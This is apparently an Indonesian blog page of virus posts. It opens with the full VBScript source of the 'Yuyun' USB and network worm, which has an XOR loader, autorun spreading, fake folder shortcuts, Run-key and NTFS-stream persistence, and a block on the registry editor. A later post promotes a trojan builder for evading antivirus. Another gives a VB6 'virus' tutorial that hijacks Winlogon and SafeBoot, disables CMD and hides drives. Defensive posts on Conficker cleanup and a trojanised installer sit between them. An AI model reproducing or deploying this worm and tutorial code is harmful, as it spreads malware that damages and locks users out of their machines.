Membuat virus yuyun ( source code virus yuyun )

Rem Worm code Begins here
‘www.xxxxx.or.id;==================================== my name:Yuyun 1.0

‘ ============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject(“scripting.filesystemobject”)
Set ws = CreateObject(“wscript.Shell”)
Set sh = CreateObject(“Shell.application”)
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+”\”+tn
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
If status=”auto” Then
sh.Explore Left(WScript.ScriptFullName,3)
Else
status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status
If fso.FolderExists(status) Then
sh.Explore status
Else
fso.CreateFolder status
sh.Explore status
End If
End If
Else
End If
Set QQ=fso.GetFile(Q)
Set Q1=QQ.OpenAsTextStream(1,0)
isiQ=Q1.Read(QQ.Size)
Q1.close
t1=InStr(1,isiQ,”Yuyun^_^~!~2008″+” >>>”,0)+18
isiQ=Right(isiQ,Len(isiQ)-t1)
hsl=””
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
Set temporary=fso.OpenTextFile(tmpt,2,True,0)
temporary.Write hsl
temporary.Close
ws.Run “WScript.exe //e:VBScript “+tmpt+” “””+Q+””””

Rem Worm encoded body begins here

‘Yuyun^_^~!~2008 >>> =======================================================
‘ My name : Yuyun Ver 1.0
‘ I just wanna see every girl looks nice, better, kinds especially a moslem girl
‘ by: Anonymouse in Jatim, November 2008
‘ When I found nothing beauty else… and then I wrote this script for all
‘=======================================================

On Error Resume Next
Dim fso, ws, status,status1, fly
Set fso = CreateObject(“scripting.filesystemobject”)
Set ws = CreateObject(“wscript.Shell”)
Set sh = CreateObject(“Shell.application”)
Set net = CreateObject(“wscript.network”)
fly=false
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+”\”+tn
docx=ws.SpecialFolders(“MyDocuments”)
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
End If
if fso.fileexists(tmp+”\Yuyun.Q”) then
set ira=fso.getfile(tmp+”\Yuyun.Q”)
ira.attributes=0
ira.name=”shalihah.ira”
if ira.name=”shalihah.ira” then
ira.name=”Yuyun.Q”
set ira=fso.opentextfile(tmp+”\Yuyun.Q”,2,true)
else
fly=true
end if
else
set ira=fso.opentextfile(tmp+”\Yuyun.Q”,2,true)
end if
Set AQ=fso.GetFile(status)
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
AQ.Copy tmpt,True
Set AQ=fso.GetFile(tmpt)
AQ.Attributes=39
anv=tmp+”\auto.exe”
If Not fso.FileExists(anv) Then AQ.Copy anv
Set auto=fso.GetFile(anv)
auto.attributes=0
Set aut=fso.OpenTextFile(anv,2,True,0)
isi=”[autorun]>open=WScript.exe //e:VBScript thumb.db auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript thumb.db auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript thumb.db auto”
isi=Replace(isi,”>”,vbCrLf)
aut.Write isi
aut.Close
auto.Attributes=39
ltkc=sh.Namespace(&H1c&).Self.path + “\Microsoft\CD Burning”
AQ.Copy ltkc+”\thumb.db”,True
auto.Copy ltkc+”\autorun.inf”,True
If fso.FileExists(docx+”\database.mdb”) Then fso.GetFile(docx+”\database.mdb”).Attributes=0
AQ.Copy docx+”\database.mdb”,True
regQ
Set rara=UNISKA
Hertz False
If Day(Now)<>3 Then rekursif docx,1 Else rekursif docx,3
call attack_net
Hertz True
Sub rekursif(path,dp)
On Error Resume Next
dropf path
wscript.sleep 50
If dp>0 Then
For Each fldr1 In fso.GetFolder(path+”\”).SubFolders
rekursif fldr1.Path, dp-1
Next
End If
End Sub
Sub dropf(path)
On Error Resume Next
if day(now)=1 and (month(now)mod 3)=1 then
rara.copy path+”\Baca AQ.rtf”
rara.copy path+”\My name is Yuyun.rtf”
end if
g1=path+”\autorun.inf”
g2=path+”\Thumb.db”
If fso.FileExists(g1) Then
Set g11=fso.GetFile(g1)
If g11.Attributes<>39 Then
g11.Attributes=0
auto.Copy path+”\autorun.inf”,True
end if
else
auto.Copy path+”\autorun.inf”,True
end if
If fso.FileExists(g2) Then
Set g12=fso.GetFile(g2)
If g12.Attributes<>39 Then
g12.Attributes=0
AQ.Copy path+”\Thumb.db”,True
end if
else
AQ.Copy path+”\Thumb.db”,True
End If
If Not fso.FileExists(path+”\Microsoft.lnk”) Then
shorZvnita path+”\Microsoft”,”Microsoft”
drop=Array(“New Harry Potter and…”,”New Folder”,”SuratQ”,”Rahasia”,”Game”,”Zvnita”,”Download”,”DataQ”,”DataQ”)
ww=1
For Each d In drop
If Day(now) Mod 3 = ww Then shorZvnita path+”\”+d,d
wscript.sleep 60
ww=ww+1
Next
r=0
For Each fldr In fso.GetFolder(path+”\”).SubFolders
shorZvnita path+”\”+fldr.name,fldr.Name
wscript.sleep 60
If r>3 Then
Exit For
End if
r=r+1
Next
End If
End Sub
Sub shorZvnita(path,trgt)
Set shor=ws.CreateShortcut(path+”.lnk”)
shor.iconlocation=”shell32.dll,3″
shor.targetpath=”wscript.exe”
shor.arguments=”//e:VBScript thumb.db “””+trgt+””””
shor.save
End Sub
function attack_net()
On Error Resume Next
err.clear
Set objFolder = sh.Namespace(&H13&)
Set colItems = objFolder.Items
For Each strFileName in objFolder.Items
t= objFolder.GetDetailsOf(strFileName, 14)
if fso.folderexists(t) then
rekursif t,4
end if
Next
End function
Sub tdr()
On Error Resume Next
err.clear
WScript.Sleep 180000
if err.number>0 then wscript.quit
End Sub
function UNISKA()
On error resume next
x=vbcrlf
adv=”Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>””Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman.””>(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: “”Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat.”” (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: “”Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya….”” (QS. An Nur:30)>>Sorry I just Nitip Print thok….Ndak pa2 khan^_^! http://www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-A’raf:26)”
adv=replace(adv,”>”,x)
set Yu2n=fso.opentextfile(tmp+”\v.doc”,2,true)
Yu2n.write adv
Yu2n.close
if day(now)=1 and (month(now)mod 3)=1 then
if fly=false then
for i=1 to 3
ws.run “notepad.exe /p “””+tmp+”\v.doc”””
next
end if
end if
set UNISKA=fso.getfile(tmp+”\v.doc”)
end function
Sub regQ()
On Error Resume Next
if day(now)=1 then
ws.RegWrite “HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\”, “Yuyun_Cantix”
ws.RegWrite “HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\”,”shell32.dll,48″
ws.RegWrite “HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes”,0,”REG_DWORD”
ws.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\”,””
end if
ws.regdelete “HKCR\lnkfile\IsShortcut”
ws.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Explorer”,”Wscript.exe //e:VBScript “””+docx+”\database.mdb”””
ws.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools”,1,”REG_DWORD”
if lcase(fso.getdrive(“c:”).FileSystem)=”ntfs” then
iraQ=AQ.openastextstream(1,0).read(AQ.size)
www=fso.GetSpecialFolder(0)
set jjk=fso.opentextfile(www+”\:Microsoft Office Update for Windows XP.sys”,2,true)
jjk.write iraQ
jjk.close
ws.RegWrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate”,”Wscript.exe //e:VBScript “””+www+”\:Microsoft Office Update for Windows XP.sys”””
end if
End Sub
Sub Hertz(ooo)
On Error Resume Next
do
For Each drv In fso.Drives
If drv.DriveType=1 Then
rekursif drv.Path,4
Else
rekursif drv.Path,2
End if
Next
if fly=false then
tdr
else
wscript.quit
end if
regQ
If ooo=False Then
Exit Do
End If
loop
End Sub

rem worm encoded body ends

Rem By xxxxxx
Rem Fully decoded, no editing take apart

Mohon Jangan Di salah gunakan…!!!

Ditulis dalam Virus. 3 Comments »

Cara Mudah Membuat Virus Komputer & Internet

Membuat virus, hal yg menyenangkan sekaligus menjengkelkan. Kadang virus yg kita buat tidak bisa bekerja dengan baik. Sekarang ini bermacam-macam cara untuk membuat virus. Cara yg paling mudah adalah menggunakan software ini. Namanya PInch pro 2 Builder. Merupakan software/ tool dirancang secara profesional untuk membuat virus. Dengan tool ini kita bisa membuat virus trojan. Tanpa memerlukan modal pengetahuan bahasa pemrograman, bahkan sampai orang awam pun bisa membuatnya. Hanya dengan setingan beberapa option langsung compile…Jadi deh virus tersbut. Mudahnya lagi tipe-tipe torjan tersebut bisa kita setting da kita ubah-ubah jenisnya. Hal ini bisa dilakukan untuk menghindar dari tangkapan anti-virus. wuih…ngeri banget ya!

download disini

Apakah anda suka membuat virus?

bentuk virus

Ditulis dalam Software, Virus. 3 Comments »

Deteksi dan Pembersihan Conficker/Recycler/Kido

Virus Conficker/Recycler/Kido ini (selanjutnya disebut virus Conficker) adalah virus yang sudah menyebar ke lebih dari 10 juta komputer di dunia. Di Indonesia sendiri diperkirakan sudah puluhan ribu komputer terinfeksi virus ini. Penyebarannya sangat canggih lewat internet, jaringan, dan Autorun di USB Flashdisk. Virus ini juga memanfaatkan sebuah bug di Microsoft Windows untuk menginfeksi sebagian besar jaringan perusahaan. Microsoft mengecam pembuat virus ini dan bahkan Microsoft berjanji akan memberikan $250.000 (Rp3 Milyar) bagi siapa saja yang bisa menangkap pelaku pembuatan virusnya.
Mungkin di situs lain sudah sangat banyak analisis dan cara pembersihan virus Conficker ini misalnya vaksin, kaspersky, microsoft, dan ribuan situs/blog lainnya. Tapi hampir semuanya memberikan solusi yang tidak begitu jelas dan kebanyakan malah membahas hal teknis yang membingungkan user pemula. Akibatnya, masih banyak user pemula yang kebingungan dan masih menanyakan bagaimana pembersihan virus ini. Tulisan ini hanya bertujuan untuk membahas cara mudah untuk mendeteksi dan membersihkan virus Conficker ini. Berikut

 

Pendeteksian, apakah komputer Anda terinfeksi virus Conficker?

1. Tidak bisa mengakses situs security

Komputer Anda sepertinya terinfeksi jika komputer Anda tidak dapat mengakses situs seperti microsoft.com, kaspersky.com, atau situs-situs lainnya yang berhubungan dengan kata-kata berikut :

nai, ca, avp, avg, vet, bit9, sans, cert , windowsupdate, wilderssecurity, threatexpert, castlecops, spamhaus, cpsecure, arcabit, emsisoft, sunbelt, securecomputing, rising, prevx, pctools, norman, k7computing, ikarus, hauri, hacksoft, gdata, fortinet, ewido, clamav, comodo, quickheal, avira, avast, esafe, ahnlab, centralcommand, drweb, grisoft, eset, nod32, f-prot, jotti, kaspersky, f-secure, computerassociates, networkassociates, etrust, panda, sophos, trendmicro, mcafee, norton, symantec, microsoft, defender, rootkit, malware, spyware, virus

2. File hidden tidak bisa ditampilkan

Anda tidak dapat menampilkan file hidden di komputer walaupun sudah mengubah setting “show hidden” di folder options atau di Smadav.

Pada saat melakukan scanning menggunakan Smadav, Smadav akan mendeteksi 1 value registry yang rusak disebabkan oleh virus conficker :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

3. SmaRT-Protection Smadav menampilkan Alert
SmaRT-Protection (SmaRTP) Smadav menampilkan Alert ketika Flashdisk yang terinfeksi dicolok ke komputer. Ada 2 file yang terdeteksi, Alamat File yang dideteksi akan berbentuk seperti ini :
[x]:\autorun.inf
[x]:\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx

*[x] adalah Drive flashdisk misalnya F, G, atau H

Andaikan komputer yang terinfeksi sudah terpasang Smadav sebelumnya, pasti tidak akan terinfeksi virus Conficker ini karena SmaRTP akan langsung mendeteksi dan menghapusnya segera setelah USB Flashdisk dicolok. Lihat screenshoot SmaRTP berikut :

Pembersihan, bagaimana cara mudahnya?

Pembersihan Conficker cukup mudah hanya dengan menggunakan tools yang sudah dibuat beberapa antivirus. Sebenarnya hampir semua Antivirus Impor dapat membersihkan virus ini, asalkan sudah di-update. Saya disini menyarankan 2 tools khusus untuk membersihkan Conficker, yaitu PCMAV Express Conficker atau Kidokiller Kaspersky.

1. Gunakan salah satu dari PCMAV Express Conficker atau Kidokiller Kaspersky.

Download PCMAV Express Conficker
cara penggunaan buka di halaman ini : pcmav-express-for-conficker

Download Kidokiller Kaspersky
cara penggunaan buka di halaman ini : Kidokiller Kaspersky

2. Update Patch Windows
Untuk menambal bug Microsoft dan mencegah infeksi ulang Conficker, Silakan Update Patch Windows di halaman Microsoft : MS08-067

3. Pasang SmaRTP Smadav
Sudah dikatakan sebelumnya, Andaikan komputer yang terinfeksi sudah terpasang Smadav sebelumnya, pasti tidak akan terinfeksi virus Conficker ini karena SmaRTP akan langsung mendeteksi dan menghapusnya segera setelah USB Flashdisk dicolok. Jadi, baik bagi komputer yang sudah pernah terinfeksi Conficker ataupun belum, pasanglah Smadav di komputer sehingga aman dari infeksinya.

Bagi blogger/situs lain diharapkan untuk mempublikasikan tulisan ini untuk membantu user yang terinfeksi Conficker. Mohon ditulis sumbernya.
Bagi pembaca yang sudah mencoba langkah-langkah diatas mohon mem-posting-kan hasilnya disini. Terima kasih

Virus Pada Billing Explorer

Berhati-hatilah Anda jika menggunakan software Billing Explorer, karena berdasarkan pengalaman yang saya alami, ada virus didalam file installasi Billing Explorer Client (pada software Server tidak ada virus).

Berdasarkan hasil scanning dari Kaspersky Antivirus, berikut ini adalah daftar file yang berisi virus pada file installasi Billing Explorer Client :

cdr32lib.sy_        : Trojan.Win32.Agent.aehk
drvlib.pm_           : Trojan.Win32.Agent.aehj
mdaprg.rp_          : Trojan.Win32.Agent.aehk
mscompz.ex_      : Trojan.Win32.Agent.aehj
msgrpw.ex_         : Trojan.Win32.Agent.aehk
mshexdec.sy_     : Trojan.Win32.Agent.aehj
mswind32.sy_     : Trojan.Win32.Agent.aehj
nccprt.ex_            : Trojan.Win32.Agent.aehk
pro2mg.sy_          : Trojan.Win32.Agent.aehk
pwrszr.ex_            : Trojan.Win32.Agent.tag
sqlwpro.ex_         : Trojan.Win32.Agent.aehj
syswin32.ex_      : Trojan.Win32.Agent.aehj
winlib32dll.ex_  : Trojan.Win32.Agent.tag
winmsdll.ex_       : Trojan.Win32.Agent.aehj
winsys.ar_            : Trojan.Win32.Agent.aehj
zndll.ex_               : Trojan.Win32.Agent.aehj

Ternyata ada banyak file yang sudah terinfeksi virus. Yang menjadi pertanyaan saya adalah: Apakah file-file tersebut memang seharusnya berada didalam file installasi Billing Explorer Client ? Apakah sebenarnya file tersebut tidak dibutuhkan sama sekali oleh program installasi ? Jika benar begitu, berarti memang virus tersebut sengaja disusupkn kedalam file installasi supaya saat kita menginstall softwarenya, maka virus akan tertular secara otomatis.

Mari kita lanjutkan. File-file virus yang menyusup ke dalam file installasi akan otomatis menginfeksi komputer saat kita menginstall Billing Explorer Client. Tidak cukup sampai disitu, sebagian dari file DLL akan diinjeksikan kedalam Windows Explorer. Metode ini sangat ampuh karena virus tidak akan tampak sebagai process dalam Task Manager, melainkan berjalan bersamaan dengan Windows Explorer sebagai DLL yang tidak kasat mata.

Hal-hal yang terjadi setelah virus tersebut aktif antara lain sebagai berikut :

  • Komputer akan menjadi sangat lambat
  • Virus akan membuat file DLL baru yang akan diinjeksikan lagi ke dalam Windows Explorer
  • Aktivitas network komputer yang terinfeksi akan sangat tinggi walaupun komputer sedang dalam keadaan idle , ini mungkin adalah salah satu cara virus untuk melumpuhkan jaringan.
  • Akan timbul serangan ARP, yaitu semua jaringan tiba-tiba down padahal aktivitas LED pada LAN masih aktif. Namun semua jaringan komputer akan lumpuh (meskipun pada komputer yang tidak terinfeksi oleh virus ini)
  • Tampaknya virus ini akan menjadikan komputer yang terinfeksi menjadi komputer zombie. Lalu dimanfaatkan untuk melakukan serangan DDOS (DDOS attack) ke suatu alamat internet tertentu dan juga berperan sebagai IRC bot.
  • Proses pembersihan virus ini akan sangat sulit, karena begitu terinfeksi, virus akan menginjeksikan banyak file DLL ke Windows Explorer dan juga mendownload virus-virus lain dari internet untuk menginfeksi komputer korban (lebih dikenal sebagai dropper)
  • Software antivirus apapun tidak akan dapat berbuat banyak untuk mengatasi virus ini jika sudah terlanjur terinfeksi. Pembersihan virus sangat sulit dilakukan, sehingga jalan satu-satunya adalah menginstall ulang komputer.

PENCEGAHAN

Karena proses pembersihan sangat sulit dilakukan jika virus sudah terlanjur menginfeksi komputer, maka cara yang paling ampuh untuk memerangi virus ini adalah dengan membersihkan file-file installasi Billing Explorer itu sendiri.  Sehingga kita dapat menghapus file-file yang nantinya menjadi virus sebelum file tersebut masuk ke dalam komputer. Atau Anda dapat mendownload file installasi Billing Explorer Client yang sudah bersih disini.

[ PERHATIAN !!! Copy Paste boleh aja asalkan disertakan sumbernya ! ]


Ditulis dalam Tutorial, Virus. 2 Comments »

Facebook Menjadi Sasaran Penyebaran Virus

Facebook Menjadi Sasaran Penyebaran VirusKalau kita bicara virus, pasti hal tersebut tidak ada habisnya. Setiap aplikasi, software, sistem operasi yang terkenal pasti akan ada virusnya. Penyebaran virus dengan cepat merupakan tujuan utama dalam pemanfaatan aplikasi, software, sistem operasi yang terkenal tersebut. Misal virus computer, akan banyak menyerang sistem operasi yang menggunakan windows. Virus handphone, akan banyak menyerang handphone dengan sistem operasi symbian. Dan kini, Facebook menjadi incaran virus-virus tersebut.

Facebook yang merupakan jejaring sosial yang paling terkenal, ini tidak luput dengan aplikasi jahat yang bernama virus. Banyak bermunculan virus facebook yang mempunyai tujuan berbeda-beda, mulai dari yang sekedar iseng tapi ada juga yang merusak.

Kita ambil contoh virus Bebloh, Bredolab, Pendex, Obfuscated, Oficla, yang memberikan pesan peringatan untuk mereset password untuk alasan keamanan

Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.

Thanks,

The Facebook Team

Virus tersebut selain memberikan pesan, juga memberikan sebuah attachment yang mengandung virus (scareware).

Scareware / antivirus palsu ini menyamarkan dirinya menjadi antispyware dengan nama Security Tools atau XP AntiMalware 2010 yang akan terinstall secara otomatis kedalam system computer yang telah terinfeksi. Antispyware palsu ini akan menampilkan peringatan palsu juga seolah-olah system kita sudah terinfeksi virus dengan menampilkan nama-nama virus / trojan yang berhasil dideteksi, tetapi file/virus tersebut sebenarnya tidak ada.

Facebook Menjadi Sasaran Penyebaran Virus

..

Facebook Menjadi Sasaran Penyebaran Virus

Kalau kita lihat, virus-virus diatas (Bebloh, Bredolab, Pendex, Obfuscated, Oficla) sesungguhnya bukan virus facebook, tetapi virus yang penyebaranya mendompleng facebook. Tapi bukan berarti di facebook bukannya tidak ada virus.

Kita ambil contoh virus Candid Camera Prank ! [HQ] yang merupakan sebuah Application (Apps) Facebook.

this is without doubt the sexiest video ever :p :p :p”

Candid Camera Prank ! [HQ]

Facebook Menjadi Sasaran Penyebaran Virus

Aplikasi ini (virus FB) perlu diwaspadai karena kemampuannya mengeksploitasi sistem pengamanan Apps Facebook, dimana tidak seperti Apps Facebook lainnya yang “hanya” terinstal jika pemilik account FB memberikan persetujuan [Allow], sebaliknya aplikasi ini akan memaksakan dirinya terinstal pada account FB kita sekalipun kita tidak pernah memberikan persetujuan instal aplikasi dan cukup dengan melakukan klik pada link yang diberikan, maka account FB anda sudah diambil alih oleh aplikasi ini dan ia akan mulai melakukan posting link ke kontak-kontak FB kita yang lain.

Facebook Menjadi Sasaran Penyebaran Virus

Aplikasi ini menggunakan nama aplikasi Winamp sehingga kita tidak akan mencurigai Winamp on facebook tersebut adalah aplikasi jahat.

Facebook Menjadi Sasaran Penyebaran Virus

Sebagai akhir dari semua ini adalah kita harus ingat pepatah “ada gula ada semut” dan “tak ada gading yang tak retak”…..

Update antivirus yang kita miliki secara rutin adalah salah satu proteksi yang terbaik yang dapat kita lakukan.

Virus For MsWord Etc

Program kita kali ini adalah membuat Virus sederhana yaitu hanya mengganggu Microsoft Office Word dan Excel.Misalkan user membuka Word maka pada kertas tempat mengetik sudah muncul pesan dari Virus demikian pula jika membuka Excel maka pesan akan diberikan virus pada cell Excel. Sederhana sekali ya..ya memang virus ini tidak merusak dokumen/file-file dan tidak mengahpus file-file apapun jadi virus yang sangat baik hati..he..he..Jika anda ingin menambahkan fiture-fiture yang kejam silahkan saja tapi disini/virus ini tidak saya tuliskan bagaimana melakukan format atau delete file ataupun fiture penyusupan lainnya (sekarang belum saatnya).Silahkan dicoba dijamin 100% tidak ada data yang dihapus, ini hanya sebuah virus permainan saja kok..berani mencoba?
Yang dibutuhkan dalam pembuatan project ini adlah : 5 buah timer dan 1 drivelistbox
Pada proyek kali ini kita dapat belajar mengenai Windows Api Sendmessage, registry, dan Otomatisasi pada Word serta Excel. Semoga bermanfaat.

Masukan semua code di bawah ini pada form
==========================================
Private Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long ‘pencari Kleas dan Window Name Suatu File
Private Declare Function SendMessage Lib “user32″ Alias “SendMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long ‘sendmessage
Private Declare Function GetDriveType& Lib “Kernel32″ Alias “GetDriveTypeA” (ByVal nDrive As String) ‘ penghandel flashdisk
Private Declare Function ExitWindowsEx Lib “user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long ‘exit windows
Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8

Option Explicit
Dim FWnd
Dim obj As Object
Dim doc As Object
Dim WrkBook As Object
Dim WrkSheet As Object
Dim i As Integer
Dim RegRun
Dim FolderStartUp
Dim FolderMyDocuments
Dim FolderTemplates
Dim FolderNetHood
Dim FolderPrintHood
Dim FolderFavorites
Dim FolderSendTo
Dim FolderPrograms
Dim FlashDisk

Private Sub Form_Load()
On Error Resume Next
‘acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi
Randomize
Me.Caption = Int(Rnd * 2221189331445#) ‘silahkan masukan angka sesuka anda
‘menggandakan diri
GandakefolderIstimewa
Me.Visible = False
App.TaskVisible = False ‘virus tidak terlihat di task manager
InfeksiRegistry
End Sub

Sub BuatWord()
On Error Resume Next
Set obj = CreateObject(“word.application”)
Set doc = CreateObject(“word.application”)
Set doc = obj.Documents.Add
doc.Content = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub

Sub BuatXls()
On Error Resume Next
Set obj = CreateObject(“excel.application”)
Set WrkBook = obj.workbooks.Add
Set WrkSheet = WrkBook.worksheets.Add
WrkSheet.Cells(15, 4) = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub

Sub InfeksiRegistry()
On Error Resume Next
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell”, “Explorer.exe” & ” “”” & FolderMyDocuments & “\services.exe””” ‘virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”, FolderFavorites & “\SalamKenal.exe” ‘virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderTemplates & “\smss.exe” ‘smss.exe berjalan pada saat startup
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderSendTo & “\System.exe” ‘System.exe berjalan pada saat startup
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ‘search pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ‘Ssearch pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\Control Panel\Colors\WindowText”, “255 0 0″, “REG_SZ” ‘DEFAULT TEKS MENJADI MERAH
RegRun.regwrite “HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\”, FolderFavorites & “\SalamKenal.exe” ‘Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun”, 1, “REG_DWORD” ‘Autorun pada CD atau USB
End Sub

Sub GandaKeFlashDisk()
On Error Resume Next
If Dir(FlashDisk & “\Winlogon.exe”) <> “Winlogon.exe” Then ‘mengecek ada atau tdknya winlogon.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & “\Winlogon.exe”, FlashDisk & “\Winlogon.exe”
SetAttr FlashDisk & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
End If
BuatFileAutorunInf
End Sub

Sub BuatFileAutorunInf()
